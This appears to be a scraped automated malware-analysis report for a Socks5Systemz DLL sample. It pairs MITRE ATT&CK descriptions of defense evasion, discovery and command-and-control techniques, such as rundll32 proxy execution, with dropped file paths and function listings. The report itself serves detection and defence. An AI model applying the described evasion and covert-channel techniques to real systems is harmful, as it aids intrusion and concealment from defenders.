Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cNF6fXdjPw.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Socks5Systemz

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c0255ceba776fb6ab24614abd9fcaae546a755_7522e4b5_44eca6bd-f2e7-40a2-818a-3bde49c10140\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1031.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1051.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF46.tmp.dmp

C:\ProgramData\rc.dat

C:\ProgramData\resource.dat

C:\ProgramData\ts.dat

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
cNF6fXdjPw.dll

Function 6CEC8107 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
libraryloaderCOMMON

Function 6CEC8003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
fileCOMMON

Function 6CEB3EDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Function 6CEB207B Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 104
synchronizationCOMMON

Function 6CEB66B9 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 96
filestringCOMMON

Function 6CEB57B7 Relevance: 15.2, APIs: 10, Instructions: 239
COMMON

Function 6CEB66CB Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57
filestringCOMMON

Function 6CEB24DF Relevance: 10.6, APIs: 7, Instructions: 118
timeCOMMON

Function 6CEB2ACD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
timeCOMMON

Function 6CEB2F6A Relevance: 7.6, APIs: 5, Instructions: 95
networkCOMMON

Function 6CEB201D Relevance: 7.5, APIs: 5, Instructions: 34
synchronizationthreadinjectionCOMMON

Function 6CEB3135 Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Function 6CEC7F40 Relevance: 6.1, APIs: 4, Instructions: 62
filetimeCOMMON

Function 6CEB219A Relevance: 6.0, APIs: 4, Instructions: 29
COMMON